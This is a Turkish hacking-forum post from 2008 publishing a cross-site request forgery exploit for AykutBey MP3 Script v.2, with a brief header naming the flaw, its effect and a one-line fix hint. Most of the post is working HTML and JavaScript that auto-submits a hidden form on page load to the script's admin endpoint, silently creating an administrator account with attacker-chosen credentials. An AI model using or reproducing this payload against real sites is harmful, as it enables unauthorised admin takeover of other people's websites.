ROOT
FORUM ROOT
PORTAL ROOT
CYBER NAVIGATION
DÖKÜMANLAR
DÖKÜMAN EKLE
DOWNLOAD/DOSYA ARSIVI
BASINDA CW
CYBER ACADEMY
ORGANIZASYON
NELER YAPTIK?
OPERASYON YÖNETIM SISTEMI
GÖREV ORG. BASVURU
YÖNETICI BASVURU FORMU
MISYON
KURALLAR
KEFALET
KEFIL HAVUZU
MEMBER NAVIGATION
YENI ÜYE BASVURU
PROFIL
MEMBER NETWORK
SIFREMI UNUTTUM
ÖZEL MESAJLARIM
ONAY E-POSTA GÖNDER
Root
>
Exploits / Vulnerabilities
> AykutBey MP3 Script - XSRF Vuln.
AykutBey MP3 Script - XSRF Vuln. | Cyber-Warrior Information Technology's World
Madde
Author :
Bug Researchers
Date :
23.09.2008 01:09:14
#
AykutBey MP3 Script - XSRF Vuln.
[Full Screen Display]
< ------------------- header data start ------------------- > ############################################################# # Application Name : AykutBey MP3 Script v.2 # Vulnerable Type : XSRF # Infection : Uzaktan otomatik olarak admin haklarina sahip kullanici eklenebilir. # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir # author : Bug Researchers ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <bOdy onLoad=Submit();> <script>function Submit(){document.Sh0cK.submit();}</script> <form action=http://www.Site.com/[Path]/pafiledb.php name=Sh0cK method=post> <input type=text size=50 name=form[username] class=forminput value=Kullaniciadi> <input type=text size=50 name=form[email] class=forminput value=Mail> <input type=text size=50 name=form[password] class=forminput value=Sifre> <select name=form[status] class=forminput><option value=1 selected>Hayir</option><option value=1>Evet</option></select> <input type=hidden name=action value=admin><input type=hidden name=ad value=admins><input type=hidden name=admins value=add><input type=hidden name=add value=do><input type=submit value=Lütfen Bekleyiniz.></form> < -- bug code end of -- >
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©